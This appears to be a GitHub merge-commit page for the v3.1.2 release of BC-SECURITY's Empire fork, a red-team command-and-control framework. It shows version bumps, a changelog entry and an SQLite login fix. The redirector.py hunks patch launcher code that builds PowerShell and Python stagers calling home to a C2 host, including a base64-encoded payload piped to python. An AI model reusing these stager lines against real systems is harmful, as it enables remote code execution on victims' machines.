Merge pull request #129 from BC-SECURITY/dev

v3.1.2 Release
BC-SECURITY · Mar 13, 2020 · e1e5c82 · e1e5c82
2 parents affa85b + a867674
commit e1e5c82
Show file tree

Hide file tree

Showing 5 changed files with 14 additions and 7 deletions.
diff --git a/VERSION b/VERSION
@@ -1 +1 @@
-3.1.1
+3.1.2
diff --git a/changelog b/changelog
@@ -1,4 +1,11 @@
+3/13/2020
+------------
+- Version 3.1.2 Master Release
+	- Fixed REST login error 500 on some version of SQLite - #120 (@justsly)
+	- Fixed generate launcher bug for redirector listener - #125 (@RedBulletTooling)
+
 3/8/2020
+------------
 - Version 3.1.1 Master Release
 	- Updated the /me endpoint that was added in 3.1.0 to return the full user object (@Vinnybod)
 	- Updated install script for Kali Powershell install - #118 (@Vinnybod)

diff --git a/lib/common/empire.py b/lib/common/empire.py
@@ -15,7 +15,7 @@
 from builtins import str
 from builtins import range
 
-VERSION = "3.1.1 BC-Security Fork"
+VERSION = "3.1.2 BC-Security Fork"
 
 from pydispatch import dispatcher
 

diff --git a/lib/common/users.py b/lib/common/users.py
@@ -108,7 +108,7 @@ def user_login(self, user_name, password):
         try:
             self.lock.acquire()
             cur = conn.cursor()
-            user = cur.execute("SELECT password from users WHERE username = ? AND enabled = true LIMIT 1", (user_name,)).fetchone()
+            user = cur.execute("SELECT password from users WHERE username = ? AND enabled = 1 LIMIT 1", (user_name,)).fetchone()
 
             if user == None:
                 return None

diff --git a/lib/listeners/redirector.py b/lib/listeners/redirector.py
@@ -195,10 +195,10 @@ def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="",
 
                 # prebuild the request routing packet for the launcher
                 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
-                b64RoutingPacket = base64.b64encode(routingPacket)
+                b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8")
 
                 #stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
-                stager += "$ser='%s';$t='%s';$hop='%s';" % (helpers.obfuscate_call_home_address(host), stage0, listenerName)
+                stager += "$ser=%s;$t='%s';$hop='%s';" % (helpers.obfuscate_call_home_address(host), stage0, listenerName)
 
                 #Add custom headers if any
                 if customHeaders != []:
@@ -264,7 +264,7 @@ def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="",
 
                 # prebuild the request routing packet for the launcher
                 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
-                b64RoutingPacket = base64.b64encode(routingPacket)
+                b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8")
 
                 launcherBase += "req=urllib2.Request(server+t);\n"
                 # add the RC4 packet to a cookie
@@ -325,7 +325,7 @@ def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="",
                 launcherBase += "exec(''.join(out))"
 
                 if encode:
-                    launchEncoded = base64.b64encode(launcherBase)
+                    launchEncoded = base64.b64encode(launcherBase).decode("utf-8")
                     launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
                     return launcher
                 else: